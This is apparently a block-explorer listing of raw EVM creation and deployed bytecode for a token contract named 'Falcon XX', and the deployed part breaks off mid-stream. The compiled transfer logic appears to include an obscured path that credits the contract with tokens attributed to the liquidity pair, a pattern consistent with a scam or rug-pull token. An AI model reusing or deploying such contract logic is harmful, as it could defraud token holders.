608060405267016345785d8a000060065566071afd498d0000600755600560085560056009556000600a5573f1d2ddd2e22b2c4e0144d532dcbc41f0ae22ed9d600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600c553480156200009157600080fd5b506000620000a46200055560201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35060065460036000620001596200055560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000737a250d5630b4cf539739df2c5dacb4c659f2488d905060008173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001fe573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002249190620005f0565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308473ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200028c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002b29190620005f0565b6040518363ffffffff1660e01b8152600401620002d192919062000633565b6020604051808303816000875af1158015620002f1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003179190620005f0565b905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160056000620003b16200055d60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160056000600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620004e46200055560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6006546040516200054591906200067b565b60405180910390a3505062000698565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620005b8826200058b565b9050919050565b620005ca81620005ab565b8114620005d657600080fd5b50565b600081519050620005ea81620005bf565b92915050565b60006020828403121562000609576200060862000586565b5b60006200061984828501620005d9565b91505092915050565b6200062d81620005ab565b82525050565b60006040820190506200064a600083018562000622565b62000659602083018462000622565b9392505050565b6000819050919050565b620006758162000660565b82525050565b60006020820190506200069260008301846200066a565b92915050565b6126d680620006a86000396000f3fe60806040526004361061014f5760003560e01c8063715018a6116100b6578063962dfc751161006f578063962dfc75146104a5578063a457c2d7146104d0578063a9059cbb1461050d578063dd62ed3e1461054a578063ea2f0b3714610587578063f2fde38b146105b057610156565b8063715018a6146103b95780637967d26d146103d05780637d1db4a5146103f95780638da5cb5b14610424578063945945d31461044f57806395d89b411461047a57610156565b8063313ce56711610108578063313ce5671461028157806339509351146102ac57806349bd5a5e146102e95780635342acb4146103145780636bc87c3a1461035157806370a082311461037c57610156565b806306fdde031461015b578063095ea7b3146101865780631694505e146101c357806318160ddd146101ee57806322976e0d1461021957806323b872dd1461024457610156565b3661015657005b600080fd5b34801561016757600080fd5b506101706105d9565b60405161017d9190611c14565b60405180910390f35b34801561019257600080fd5b506101ad60048036038101906101a89190611ccf565b610616565b6040516101ba9190611d2a565b60405180910390f35b3480156101cf57600080fd5b506101d8610634565b6040516101e59190611da4565b60405180910390f35b3480156101fa57600080fd5b5061020361065a565b6040516102109190611dce565b60405180910390f35b34801561022557600080fd5b5061022e610664565b60405161023b9190611dce565b60405180910390f35b34801561025057600080fd5b5061026b60048036038101906102669190611de9565b61066a565b6040516102789190611d2a565b60405180910390f35b34801561028d57600080fd5b50610296610722565b6040516102a39190611e58565b60405180910390f35b3480156102b857600080fd5b506102d360048036038101906102ce9190611ccf565b61072b565b6040516102e09190611d2a565b60405180910390f35b3480156102f557600080fd5b506102fe6107d7565b60405161030b9190611e82565b60405180910390f35b34801561032057600080fd5b5061033b60048036038101906103369190611e9d565b6107fd565b6040516103489190611d2a565b60405180910390f35b34801561035d57600080fd5b50610366610853565b6040516103739190611dce565b60405180910390f35b34801561038857600080fd5b506103a3600480360381019061039e9190611e9d565b610859565b6040516103b09190611dce565b60405180910390f35b3480156103c557600080fd5b506103ce6108a2565b005b3480156103dc57600080fd5b506103f760048036038101906103f29190611e9d565b6109f5565b005b34801561040557600080fd5b5061040e610ae5565b60405161041b9190611dce565b60405180910390f35b34801561043057600080fd5b50610439610aeb565b6040516104469190611e82565b60405180910390f35b34801561045b57600080fd5b50610464610b14565b6040516104719190611dce565b60405180910390f35b34801561048657600080fd5b5061048f610b1a565b60405161049c9190611c14565b60405180910390f35b3480156104b157600080fd5b506104ba610b57565b6040516104c79190611e82565b60405180910390f35b3480156104dc57600080fd5b506104f760048036038101906104f29190611ccf565b610b7d565b6040516105049190611d2a565b60405180910390f35b34801561051957600080fd5b50610534600480360381019061052f9190611ccf565b610c29565b6040516105419190611d2a565b60405180910390f35b34801561055657600080fd5b50610571600480360381019061056c9190611eca565b610c47565b60405161057e9190611dce565b60405180910390f35b34801561059357600080fd5b506105ae60048036038101906105a99190611e9d565b610cce565b005b3480156105bc57600080fd5b506105d760048036038101906105d29190611e9d565b610dbe565b005b60606040518060400160405280600981526020017f46616c636f6e2058580000000000000000000000000000000000000000000000815250905090565b600061062a610623610f7f565b8484610f87565b6001905092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600654905090565b60095481565b6000610677848484611150565b61071784610683610f7f565b84600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106cd610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107129190611f39565b610f87565b600190509392505050565b60006009905090565b60006107cd610738610f7f565b848460046000610746610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107c89190611f6d565b610f87565b6001905092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a5481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108aa610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610937576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092e90611fed565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6109fd610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8190611fed565b60405180910390fd5b6001600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60075481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600c5481565b60606040518060400160405280600881526020017f46616c636f6e5858000000000000000000000000000000000000000000000000815250905090565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610c1f610b8a610f7f565b848460046000610b98610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c1a9190611f39565b610f87565b6001905092915050565b6000610c3d610c36610f7f565b8484611150565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cd6610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d5a90611fed565b60405180910390fd5b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b610dc6610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4a90611fed565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ec2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eb99061207f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ff6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fed90612111565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611065576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105c906121a3565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111439190611dce565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b690612235565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361122e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611225906122c7565b60405180910390fd5b60008111611271576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161126890612359565b60405180910390fd5b600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156113155750600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561136f5750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156113cd576007548161138184610859565b61138b9190611f6d565b11156113cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c3906123eb565b60405180910390fd5b5b66071afd498d00006113de30610859565b101580156113f95750600d60009054906101000a900460ff16155b80156114535750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156114925750611462610aeb565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156114d157506114a1610aeb565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15611524576001600d60006101000a81548160ff02191690831515021790555060006114fc30610859565b905061150781611700565b6000600d60006101000a81548160ff021916908315150217905550505b61152d81611784565b506000819050600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156115d75750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156115e9576115e682856117b9565b90505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546116389190611f6d565b9250508190555081600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461168e9190611f39565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516116f29190611dce565b60405180910390a350505050565b600061170b826118a8565b9050600081111561178057600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f1935050505015801561177e573d6000803e3d6000fd5b505b5050565b6000600854826008546117979190611f6d565b6117a19190611f39565b6008819055506117b082611b02565b60019050919050565b6000806064600954856117cc919061240b565b6117d6919061247c565b905080600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546118279190611f6d565b925050819055503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161188b9190611dce565b60405180910390a3808461189f9190611f39565b91505092915050565b6000804790506000600267ffffffffffffffff8111156118cb576118ca6124ad565b5b6040519080825280602002602001820160405280156118f95781602001602082028036833780820191505090505b5090503081600081518110611911576119106124dc565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119b8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906119dc9190612520565b816001815181106119f0576119ef6124dc565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611a5730600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686610f87565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478560008430426040518663ffffffff1660e01b8152600401611abb959493929190612646565b600060405180830381600087803b158015611ad557600080fd5b505af1158015611ae9573d6000803e3d6000fd5b505050508147611af99190611f39565b92505050919050565b600061040082611b129190611f6d565b905060018210611b2757611b2581611b2b565b505b5050565b600060085482600854611b3e9190611f6d565b611b489190611f39565b600881905550611b7a82600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166117b9565b5060019050919050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611bbe578082015181840152602081019050611ba3565b60008484015250505050565b6000601f19601f8301169050919050565b6000611be682611b84565b611bf08185611b8f565b9350611c00818560208601611ba0565b611c0981611bca565b840191505092915050565b60006020820190508181036000830152611c2e8184611bdb565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611c6682611c3b565b9050919050565b611c7681611c5b565b8114611c8157600080fd5b50565b600081359050611c9381611c6d565b92915050565b6000819050919050565b611cac81611c99565b8114611cb757600080fd5b50565b600081359050611cc981611ca3565b92915050565b60008060408385031215611ce657611ce5611c36565b5b6000611cf485828601611c84565b9250506020611d0585828601611cba565b9150509250929050565b60008115159050919050565b611d2481611d0f565b82525050565b6000602082019050611d3f6000830184611d1b565b92915050565b6000819050919050565b6000611d6a611d65611d6084611c3b565b611d45565b611c3b565b9050919050565b6000611d7c82611d4f565b9050919050565b6000611d8e82611d71565b9050919050565b611d9e81611d83565b82525050565b6000602082019050611db96000830184611d95565b92915050565b611dc881611c99565b82525050565b6000602082019050611de36000830184611dbf565b92915050565b600080600060608486031215611e0257611e01611c36565b5b6000611e1086828701611c84565b9350506020611e2186828701611c84565b9250506040611e3286828701611cba565b9150509250925092565b600060ff82169050919050565b611e5281611e3c565b82525050565b6000602082019050611e6d6000830184611e49565b92915050565b611e7c81611c5b565b82525050565b6000602082019050611e976000830184611e73565b92915050565b600060208284031215611eb357611eb2611c36565b5b6000611ec184828501611c84565b91505092915050565b60008060408385031215611ee157611ee0611c36565b5b6000611eef85828601611c84565b9250506020611f0085828601611c84565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611f4482611c99565b9150611f4f83611c99565b9250828203905081811115611f6757611f66611f0a565b5b92915050565b6000611f7882611c99565b9150611f8383611c99565b9250828201905080821115611f9b57611f9a611f0a565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611fd7602083611b8f565b9150611fe282611fa1565b602082019050919050565b6000602082019050818103600083015261200681611fca565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612069602683611b8f565b91506120748261200d565b604082019050919050565b600060208201905081810360008301526120988161205c565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006120fb602483611b8f565b91506121068261209f565b604082019050919050565b6000602082019050818103600083015261212a816120ee565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061218d602283611b8f565b915061219882612131565b604082019050919050565b600060208201905081810360008301526121bc81612180565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061221f602583611b8f565b915061222a826121c3565b604082019050919050565b6000602082019050818103600083015261224e81612212565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006122b1602383611b8f565b91506122bc82612255565b604082019050919050565b600060208201905081810360008301526122e0816122a4565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612343602983611b8f565b915061234e826122e7565b604082019050919050565b6000602082019050818103600083015261237281612336565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006123d5602883611b8f565b91506123e082612379565b604082019050919050565b60006020820190508181036000830152612404816123c8565b9050919050565b600061241682611c99565b915061242183611c99565b925082820261242f81611c99565b9150828204841483151761244657612445611f0a565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061248782611c99565b915061249283611c99565b9250826124a2576124a161244d565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60008151905061251a81611c6d565b92915050565b60006020828403121561253657612535611c36565b5b60006125448482850161250b565b91505092915050565b6000819050919050565b600061257261256d6125688461254d565b611d45565b611c99565b9050919050565b61258281612557565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b6125bd81611c5b565b82525050565b60006125cf83836125b4565b60208301905092915050565b6000602082019050919050565b60006125f382612588565b6125fd8185612593565b9350612608836125a4565b8060005b8381101561263957815161262088826125c3565b975061262b836125db565b92505060018101905061260c565b5085935050505092915050565b600060a08201905061265b6000830188611dbf565b6126686020830187612579565b818103604083015261267a81866125e8565b90506126896060830185611e73565b6126966080830184611dbf565b969550505050505056fea2646970667358221220f5285dc4daf74c281977454653e1d973d6376d50f37aaf36f387370f0e66a57664736f6c63430008130033

Deployed Bytecode

0x60806040526004361061014f5760003560e01c8063715018a6116100b6578063962dfc751161006f578063962dfc75146104a5578063a457c2d7146104d0578063a9059cbb1461050d578063dd62ed3e1461054a578063ea2f0b3714610587578063f2fde38b146105b057610156565b8063715018a6146103b95780637967d26d146103d05780637d1db4a5146103f95780638da5cb5b14610424578063945945d31461044f57806395d89b411461047a57610156565b8063313ce56711610108578063313ce5671461028157806339509351146102ac57806349bd5a5e146102e95780635342acb4146103145780636bc87c3a1461035157806370a082311461037c57610156565b806306fdde031461015b578063095ea7b3146101865780631694505e146101c357806318160ddd146101ee57806322976e0d1461021957806323b872dd1461024457610156565b3661015657005b600080fd5b34801561016757600080fd5b506101706105d9565b60405161017d9190611c14565b60405180910390f35b34801561019257600080fd5b506101ad60048036038101906101a89190611ccf565b610616565b6040516101ba9190611d2a565b60405180910390f35b3480156101cf57600080fd5b506101d8610634565b6040516101e59190611da4565b60405180910390f35b3480156101fa57600080fd5b5061020361065a565b6040516102109190611dce565b60405180910390f35b34801561022557600080fd5b5061022e610664565b60405161023b9190611dce565b60405180910390f35b34801561025057600080fd5b5061026b60048036038101906102669190611de9565b61066a565b6040516102789190611d2a565b60405180910390f35b34801561028d57600080fd5b50610296610722565b6040516102a39190611e58565b60405180910390f35b3480156102b857600080fd5b506102d360048036038101906102ce9190611ccf565b61072b565b6040516102e09190611d2a565b60405180910390f35b3480156102f557600080fd5b506102fe6107d7565b60405161030b9190611e82565b60405180910390f35b34801561032057600080fd5b5061033b60048036038101906103369190611e9d565b6107fd565b6040516103489190611d2a565b60405180910390f35b34801561035d57600080fd5b50610366610853565b6040516103739190611dce565b60405180910390f35b34801561038857600080fd5b506103a3600480360381019061039e9190611e9d565b610859565b6040516103b09190611dce565b60405180910390f35b3480156103c557600080fd5b506103ce6108a2565b005b3480156103dc57600080fd5b506103f760048036038101906103f29190611e9d565b6109f5565b005b34801561040557600080fd5b5061040e610ae5565b60405161041b9190611dce565b60405180910390f35b34801561043057600080fd5b50610439610aeb565b6040516104469190611e82565b60405180910390f35b34801561045b57600080fd5b50610464610b14565b6040516104719190611dce565b60405180910390f35b34801561048657600080fd5b5061048f610b1a565b60405161049c9190611c14565b60405180910390f35b3480156104b157600080fd5b506104ba610b57565b6040516104c79190611e82565b60405180910390f35b3480156104dc57600080fd5b506104f760048036038101906104f29190611ccf565b610b7d565b6040516105049190611d2a565b60405180910390f35b34801561051957600080fd5b50610534600480360381019061052f9190611ccf565b610c29565b6040516105419190611d2a565b60405180910390f35b34801561055657600080fd5b50610571600480360381019061056c9190611eca565b610c47565b60405161057e9190611dce565b60405180910390f35b34801561059357600080fd5b506105ae60048036038101906105a99190611e9d565b610cce565b005b3480156105bc57600080fd5b506105d760048036038101906105d29190611e9d565b610dbe565b005b60606040518060400160405280600981526020017f46616c636f6e2058580000000000000000000000000000000000000000000000815250905090565b600061062a610623610f7f565b8484610f87565b6001905092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600654905090565b60095481565b6000610677848484611150565b61071784610683610f7f565b84600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106cd610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107129190611f39565b610f87565b600190509392505050565b60006009905090565b60006107cd610738610f7f565b848460046000610746610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107c89190611f6d565b610f87565b6001905092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a5481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108aa610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610937576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092e90611fed565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6109fd610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8190611fed565b60405180910390fd5b6001600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60075481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600c5481565b60606040518060400160405280600881526020017f46616c636f6e5858000000000000000000000000000000000000000000000000815250905090565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610c1f610b8a610f7f565b848460046000610b98610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c1a9190611f39565b610f87565b6001905092915050565b6000610c3d610c36610f7f565b8484611150565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cd6610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d5a90611fed565b60405180910390fd5b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b610dc6610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4a90611fed565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ec2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eb99061207f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ff6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fed90612111565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611065576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105c906121a3565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111439190611dce565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b690612235565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361122e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611225906122c7565b60405180910390fd5b60008111611271576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161126890612359565b60405180910390fd5b600560008473ffffffffffffffffffffffff